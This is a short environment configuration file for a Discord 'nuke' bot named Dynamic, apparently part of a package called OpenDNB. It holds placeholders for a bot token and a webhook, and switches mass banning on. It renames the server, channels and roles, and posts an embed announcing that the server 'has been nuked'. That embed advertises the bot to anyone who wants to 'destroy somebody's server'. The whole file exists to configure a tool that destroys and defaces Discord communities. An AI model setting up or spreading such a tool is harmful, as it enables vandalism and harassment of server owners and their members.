BOT_TOKEN="Your token"
BOT_OWNER_ID="Your ID"

MASS_BAN=true

WEBHOOK_URL="Your webhook url"
AVATAR_URL="https://media.discordapp.net/attachments/1160835997291003985/1193503823948423228/IMG_9971.jpg?ex=6612778d&is=6600028d&hm=af0b82ff4b0d9165497f57dcc37d66885b233ad6984f44b03fa78149f02ee040&=&format=webp&width=637&height=617"

PREFERRED_LOCALE="el"

CHANNEL_NAME="el-dynamic"
SERVER_NAME="<<DYNAM!C>>"
ROLE_NAME="DYNAMIC"


EMBED_TITLE="Your server has been nuked by Dynamic"
EMBED_DESCRIPTION="```Dynamic is one of the most powerful discord nuke bot. Unfortunately this server has been nuked due to inactive admins.```\n\n### If you're interested in this bot or you need to destroy somebody's server you can join our discord server.\n\n\n**OpenDNB has:**\n\n* `Powerful bots with uptime 24/7`\n* `Good community`\n"